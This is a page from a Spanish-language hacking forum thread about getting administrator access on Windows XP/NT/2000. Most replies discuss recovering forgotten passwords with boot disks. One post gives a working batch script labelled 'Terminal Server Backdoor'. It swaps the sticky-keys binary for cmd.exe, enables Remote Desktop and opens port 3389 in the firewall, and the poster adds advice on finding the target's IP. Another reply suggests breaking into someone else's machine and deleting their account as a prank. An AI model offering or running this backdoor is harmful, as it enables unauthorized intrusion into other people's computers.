elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  Entrar a XP/NT/2000 como administrador en 30 segundos
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 ... 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [22] 23 24 Ir Abajo Respuesta Imprimir
Autor Tema: Entrar a XP/NT/2000 como administrador en 30 segundos  (Leído 335,637 veces)
marmartinez

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Entrar a XP/NT/2000 como administrador en 30 segundos
« Respuesta #210 en: 19 Junio 2009, 04:08 am »

jaja... seguro que no es mi empresa solo soy empleado  ;)

el tema es asi me conecto remotamente desde mi of a travez del Esc Rem a un W2000 donde se encuentra una base de datos en SQL... lo que hago es actualizar un ejecutable hecho en VFP... asi cuando las pcs encienden se fijan en este servidor si hay una nueva version y si es asi se actualiza el programita. El problema es que alguien cambio la contraseña y cuando llamo me dicen "que nadie fue" y no me puedo conectar mas. Pero bueno seguire buscando si encuentra algo lo posteo. Gracias! Saludos!.

 :)


En línea

roco446

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Entrar a XP/NT/2000 como administrador en 30 segundos
« Respuesta #211 en: 14 Julio 2009, 22:05 pm »

Hola. Estoy buscando ayuda ya que segui el tutorial de "Azazel" de la primera pagina y cuando reinicio windows con el floppy no me arranca nada nisiquiera se para a leer la unidad de diskette, sin embargo el programa si me instalo el arranque bien. Ayudenme profavor, gracias ;-)


En línea

DenieruMza

Desconectado Desconectado

Mensajes: 1



Ver Perfil
Re: Entrar a XP/NT/2000 como administrador en 30 segundos
« Respuesta #212 en: 30 Julio 2009, 18:26 pm »

Probá entrando al SETUP de la PC, y fijate que la secuencia de booteo esté en orden (o sea, para arrancar primero del floppy), o bien en algunos dispositivos de hardware se te permite mediante alguan tecla F (F12 por ejemplo) seleccionar por única vez, desde donde bootear. Fijate, seguro que es eso, o algo hiciste mal o tenes una mala copia del programa.

O sino tenes esta otra opción:

El que lo necesite mandeme un PM, que le paso un link o se lo mando yo al mail, con una ISO lista para quemarse en un CD del CIA COMMANDER. La unidad óptica me ha resultado más práctica de utilizar que el diskette, sin embargo de esta última manera  también se puede.
En línea

CrAzY_Dangerous

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Entrar a XP/NT/2000 como administrador en 30 segundos
« Respuesta #213 en: 14 Septiembre 2009, 05:47 am »

a ver si alguien me ayuda:
resulta que necesito recuperar el pass del admin de mi PC pero no me ha dado resultado ni con el cia commander ni con el ERD ni con el mini PE
 y resulta que ninguno me da error, le doy a cambiar el pass y me dice que todo bien y cuando trato de entrar con el nuevo pass no me deja...
quien me puede ayudar porfiss..
Gracias de antemano
En línea

50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Re: Entrar a XP/NT/2000 como administrador en 30 segundos
« Respuesta #214 en: 14 Septiembre 2009, 11:35 am »

si cambias la pass y esta no entra puede que tengas algun archivo que de ordenes constantes de cambio de pass al admin

lo que puedes hacer es mirar todo tu pc en busca de esos virus o con algun programa averiguarla
En línea

n3fisto

Desconectado Desconectado

Mensajes: 153


Ver Perfil
Re: Entrar a XP/NT/2000 como administrador en 30 segundos
« Respuesta #215 en: 9 Noviembre 2009, 04:49 am »

control userpasswords2
En línea

50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Re: Entrar a XP/NT/2000 como administrador en 30 segundos
« Respuesta #216 en: 9 Noviembre 2009, 09:10 am »

Código:
@echo off
title Terminal Server Backdoor
color 0a

copy /y %homedrive%\Windows\system32\sethc.exe %homedrive%\Windows\system32\sethc.cpy>nul
copy /y %homedrive%\Windows\system32\cmd.exe %homedrive%\Windows\system32\sethc.exe>nul

reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /d 0 /t reg_dword /f>nul
netsh firewall add portopening all 3389 terminal>nul




Este Script en batch lo que hace es crear una cmd que salga al apretar 5 veces la tecla shift, es decir, remplaza al sticky keys de windows y funciona en todas sus plataformas desde win 95 a win 7

Luego abre el terminal server y añade una excepcion al firewall

Luego os falta averiguar su ip y que tenga modem ya que si tiene router y no tiene abierto el puerto 3389 del ts no funcionara
En línea

stargatespawn

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Entrar a XP/NT/2000 como administrador en 30 segundos
« Respuesta #217 en: 4 Febrero 2010, 02:47 am »

lo que yo recomiendo si es que se les olvido la contraseña es que busquen un cd de arranque booteable que les borre el usuario y despues sacan el cd reinician la pc y listo queda virgen sin ningun usuario al inicio y con eso se evitan tanto rollo.Lo unico malo de esta forma es que si no es por olvido de contraseña y lo que querian era entrar a la maquina de alguien el otro se va a enterar de que entraron a la fuerza a su maquina cuando no encuentre al encender la maquina su usuario.hasta lo pueden usar para gastar una broma despues de borrar el usuario crean uno ustedes con el mismo nombre pero con otra contraseña y cuando quiera entrar no va a poder ;D .bueno en este momento no encuentro el nombre del cd booteable pero si a alguno le interesa busquenlo en internet como Hiren's Boot y bajenlo
En línea

icarito28762

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: Entrar a XP/NT/2000 como administrador en 30 segundos
« Respuesta #218 en: 7 Marzo 2010, 13:12 pm »

Amigo Stargatespawn
Nos podrias ayudar dandonos la recomendacion del nombre del programa que se pudiese utizar???? Te lo agradecemos de antemano. Saludos
En línea

icarito28762

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: Entrar a XP/NT/2000 como administrador en 30 segundos
« Respuesta #219 en: 24 Marzo 2010, 19:42 pm »

Hola amigos.
Les comento que habiendo leido las 15 pag de este post, probe el Cia Commander con TODO EXITO y pude conseguir, averiguar y cambiar la clave del Administrador.
Sin embargo, entre los post lei que LASTIMOSAMENTE no funciona con CD, sino con Floppy. Nadie ha escrito si esto es factible. O x si acaso, exista otro programa con similares caracteristicas pero que pueda ser usado con CD cuando haces el reboot de tu PC. Ya son muy pocas PC que mantienen el floppy diskette. Me ayudan por favor???Gracias
En línea

Páginas: 1 ... 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [22] 23 24 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines